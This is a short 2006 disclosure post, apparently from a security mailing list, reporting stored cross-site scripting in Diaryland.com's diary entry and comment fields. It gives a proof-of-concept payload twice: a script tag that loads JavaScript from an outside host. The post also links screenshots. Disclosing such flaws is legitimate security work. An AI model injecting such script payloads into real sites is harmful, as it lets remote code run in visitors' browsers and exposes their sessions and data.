Diaryland.com - XSS

Mon, 12 Jun 2006 08:35:49 -0700 

Diaryland.com


Homepage:

http://www.diaryland.com


Effected files:

input boxes on creating diary entries.

posting comments in diary entries


XSS Vuln PoC:


With no filter evasion at all, we simply put as our entry:


[SCRIPT SRC=http://youfucktard.com/xss.js][/SCRIPT]


Screenshots:

http://www.youfucktard.com/xsp/diary1.jpg

http://www.youfucktard.com/xsp/diary2.jpg


XSS Vuln when posting comments in entries:


Again, same as above, no filter evasion:

[SCRIPT SRC=http://youfucktard.com/xss.js][/SCRIPT]


Screenshots:

http://www.youfucktard.com/xsp/diary3.jpg

http://www.youfucktard.com/xsp/diary4.jpg

Reply via email to